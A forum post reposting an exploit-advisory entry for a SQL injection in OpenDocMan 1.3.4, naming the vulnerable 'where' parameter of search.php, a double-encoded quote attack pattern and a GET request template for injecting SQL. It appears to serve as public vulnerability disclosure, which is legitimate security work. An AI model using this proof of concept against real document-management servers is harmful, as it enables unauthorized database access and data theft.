XenoG Posted November 8, 2022 Group: Members Content Count: 417 Achievement Points: 2,440 With Us For: 154 Days Status: Offline Last Seen: December 19, 2022 Device: Windows Share Posted November 8, 2022 =========================================================================================== # Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection # CVE: N/A # Date: 05/03/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/opendocman/files/ # Software Link: https://sourceforge.net/projects/opendocman/files/ # Version: v1.3.4 # Category: Webapps # Tested on: Wamp64, @Win # Software description: OpenDocMan is a web based document management system (DMS) written in PHP designed to comply with ISO 17025 and OIE standard for document management. It features fine grained control of access to files, and automated install and upgrades. =========================================================================================== # POC - SQLi # Parameters : where # Attack Pattern : %2527 # GET Request : http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on =========================================================================================== Link to comment Share on other sites More sharing options...
.thumb.jpg.efe932f5496dec4b6be0a5bdbb70a948.jpg)
Recommended Posts